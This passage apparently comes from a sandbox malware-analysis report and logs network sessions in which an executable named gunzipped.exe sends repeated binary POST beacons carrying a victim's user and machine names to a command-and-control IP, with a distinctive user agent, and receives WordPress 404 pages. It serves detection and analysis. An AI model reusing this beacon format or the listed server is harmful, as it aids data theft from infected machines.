6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:06.803180933 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:06.803220987 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:06.803258896 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:06.803303003 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:06.803345919 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:06.803385973 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:06.803426027 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:06.803466082 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:06.803512096 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          49192.168.2.549762136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:07.152096987 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:07.356178999 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:08.274482965 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:07 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
                          Apr 17, 2024 03:18:08.274544954 CEST1289INData Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29
                          Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
                          Apr 17, 2024 03:18:08.274588108 CEST1289INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69
                          Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
                          Apr 17, 2024 03:18:08.274626017 CEST1289INData Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28
                          Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
                          Apr 17, 2024 03:18:08.274665117 CEST1289INData Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74
                          Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
                          Apr 17, 2024 03:18:08.274704933 CEST1289INData Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73
                          Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
                          Apr 17, 2024 03:18:08.274748087 CEST1289INData Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69
                          Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
                          Apr 17, 2024 03:18:08.274790049 CEST1289INData Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35
                          Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
                          Apr 17, 2024 03:18:08.274827957 CEST1289INData Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65
                          Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
                          Apr 17, 2024 03:18:08.274871111 CEST1289INData Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29
                          Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          50192.168.2.549764136.244.109.75804080C:\Users\user\Desktop\gunzipped.exe
                          TimestampBytes transferredDirectionData
                          Apr 17, 2024 03:18:08.625525951 CEST244OUTPOST /index.php/1748937 HTTP/1.0
                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                          Host: 136.244.109.75
                          Accept: */*
                          Content-Type: application/octet-stream
                          Content-Encoding: binary
                          Content-Key: 412D3974
                          Content-Length: 153
                          Connection: close
                          Apr 17, 2024 03:18:08.829883099 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                          Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
                          Apr 17, 2024 03:18:09.742115021 CEST1289INHTTP/1.0 404 Not Found
                          Date: Wed, 17 Apr 2024 01:18:08 GMT
                          Server: Apache/2.4.52 (Ubuntu)
                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                          Cache-Control: no-cache, must-revalidate, max-age=0
                          Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/"
                          Connection: close
                          Content-Type: text/html; charset=UTF-8
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e
                          Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found &#8211; Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world &raquo; Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/*! This file is auto-generated */!function(i,n
